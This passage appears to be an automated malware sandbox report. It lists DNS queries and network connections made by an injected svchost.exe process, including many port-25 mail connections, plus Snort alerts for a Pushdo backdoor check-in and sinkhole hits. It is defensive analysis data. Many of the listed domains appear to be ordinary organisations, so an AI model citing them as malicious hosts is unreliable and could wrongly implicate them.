                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.161.136.188 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: refintl.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 207.180.198.201 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 89gospel.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: listel.co.jp
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sidepath.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: karila.fr
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.142.173 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zemarmot.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.se
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.15.134.44 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: thiessen.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.107.169.125 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.237.66.112 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: techtrans.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: calvinly.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftchat.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.122.24.177 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pcoyuncu.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kavram.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: webavant.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: koz1.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: yasuma.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.32.254 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 4locals.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.13 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.14 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: from30ty.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.76.27.77 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bigzz.by
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 43.246.117.171 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vonparis.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.179 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.10.34 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: envogen.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: x96.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kairel.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nlcv.bas.bg
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: com-edit.fr
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: linac.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.15.20 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: uster.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: noblesse.be
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bossinst.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: redgiga.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fnsds.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: someikan.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hubbikes.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.223 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: riwn.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-mould.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.12.244 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: geecl.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: toundo.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dbnet.at
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ktenergo.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.220.211.163 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.diamir.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.146.206 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.148.147 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.wnsavoy.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: juso-gr.ch
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.216.241.100 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.216.107 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: midap.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smitko.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.19.68 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: anteph.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: yhsll.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mikihan.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ramkome.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wahw.com.au
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.178.189.131 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.89.6.56 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.239.34.21 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kayoaiba.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbmfg.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: orlyhotel.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccssinc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 27.0.174.59 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-trust.jp
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.209.32.212 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.225.40.19 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pro-fa.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.31.76.90 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.48.207 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: forbin.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: univi.it
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cutchie.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.64.163.50 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.live.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: grlawcc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 134.119.176.30 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.19.116.195 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.213.117.166 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.pb-games.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ex-olive.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.169.15.168 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.2.132 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: coxkitchensandbaths.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: invictus.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: holp-ai.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.145 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bible.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: missnue.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: jsaps.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.126.211.112 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.131 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: haigh-me.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.144 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.243.77 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: canasil.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ldh.la.gov
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.195.90.46 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.167.255.150 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpmteam.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: awfraser.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: s5w.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: in1.smtp.messaginguser.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.sclover3.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.186.238.101 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: araax.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.129.97 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: isom.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: any-s.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.78.104.3 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ciicsc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.0.82 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: metaforacom.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 210.140.73.39 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dhh.la.gov
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbras.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ymlp15.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 72.251.233.245 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vvsteknik.dk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: biosolve.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hbfuels.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: atis-sk.ca
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cvswl.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.3 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: infotech.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cubodown.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.sbcglobal.yahoo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cqdgroup.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.164.178 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.muhr-soehne.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 63.251.106.25 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fortknox.bm
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 212.44.102.57 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: camamat.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.74.157.89 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ikulani.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: alexpope.biz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjborden.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fundeo.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.233.160.146 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: lpver.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.34.228.78 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: web-york.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.217 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.216 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sanfotek.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fr-dat.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.172.94.1 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.128.140.29 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: beafin.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: stopllc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 38.111.255.201 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dzm.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: oozkranj.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.11.56.48 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: arowines.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rast.se
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fifa-ews.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hazmatt.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aba.org.eg
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.91.167.60 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shiner.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.87 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.187.206.66 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.reglera.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kustnara.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: msl-lock.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: apcotex.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.32.172 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: scip.org.uk
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.214.171.193 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.169.149.78 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: epc.com.au
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.95.235 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: slower.it
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: okashimo.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.18.233 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.55.51 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.224.10.110 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: workplus.hu
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: awal.ws
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: jnf.at
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: top1oil.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mjrcpas.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: at-shun.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjcagent.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kumaden.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 81.169.145.175 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: daytonir.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: iranytu.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.42.105.162 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: banvari.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 178.249.70.75 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.142.176.225 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccrsi.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: snf.it
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbaben.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sinwal.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: likangds.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: h-et-l.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rkengg.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: madjek.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.4.16.43 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wnit.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: captlfix.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: popbook.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: acraloc.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: revoldia.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: eos-i.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: amele.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: atb-lit.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: uhsa.edu.ag
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: skgm.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pleszew.policja.gov.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: icd-host.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.212.145.129 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.56.33.8 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: burstner.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.154.163.204 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: xinhui.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 86.105.245.69 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aluminox.es
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ie-roi.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.112.69.92 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mijash3.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: xult.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shanks.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.239.201.14 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vivastay.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.175 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.169 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-asset.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.70.68.254 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.72.4.226 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: plaske.ua
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.98.99.30 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: touchfam.ca
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.100.180.31 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: indonesiamedia.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.235.32 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: a-domani.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.235.31 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettlinx.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: softizer.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rokoron.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: k-nikko.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.193.133 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jroy.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbp-jp.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: doggybag.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sgk.home.pl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.197.121.220 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 148.72.176.26 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: htsmx.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.96.7 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.181.161.11 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dwid.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: skypearl.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.92.82.47 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.210.36.66 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.209.253.30 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: esmoke.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 78san.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: simetar.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: btsi.com.ph
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: agulatex.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gcss.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 64.18.191.61 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.161.192 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.178.208.141 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.143.148 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: alt4.gmail-smtp-in.l.google.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: leapc.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: magicomm.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: xsui.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nolaoig.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.64.147.213 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mkm-gr.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dyag-eng.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hchc.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: webband.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.204.56 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: keio-web.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.97.7 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 603888.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.242.15.119 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ascc.org.au
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: canmore.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pertex.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.164.242 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.231.13.148 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rappich.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.mail.yahoo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: insia.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.130.253.23 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.172.28.89 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: biurohera.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: agitz.com.br
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sokuwan.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: duiops.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.200.51.73 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.15.12.103 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mcseurope.nl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: orbitgas.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.1.81.28 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fogra.com.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: polprime.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nrsi.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mondopp.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.39.198.18 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: deckoviny.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: roewer.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.54.117.242 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettle.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: diamir.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.udesign.biz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zugseil.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: jabian.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.compuserve.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.252.159.116 25
                  Source: TrafficSnort IDS: 2016867 ET TROJAN Backdoor.Win32.Pushdo.s Checkin 192.168.2.6:49711 -> 172.67.208.67:80
                  Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 63.251.106.25:80 -> 192.168.2.6:50270
                  Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 173.231.184.124:80 -> 192.168.2.6:50338
                  Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 72.251.233.245:80 -> 192.168.2.6:53142
                  Source: unknownDNS traffic detected: query: kewlmail.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: atis-sk.ca replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: webband.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: invictus.pl replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: www.udesign.biz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: cvswl.org replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: amele.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: com-edit.fr replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: ktenergo.ru replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: mail7.digitalwaves.co.nz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: amba-tc.si replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mjrcpas.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: canmore.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: mondopp.net replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: www.jroy.net replaycode: Name error (3)
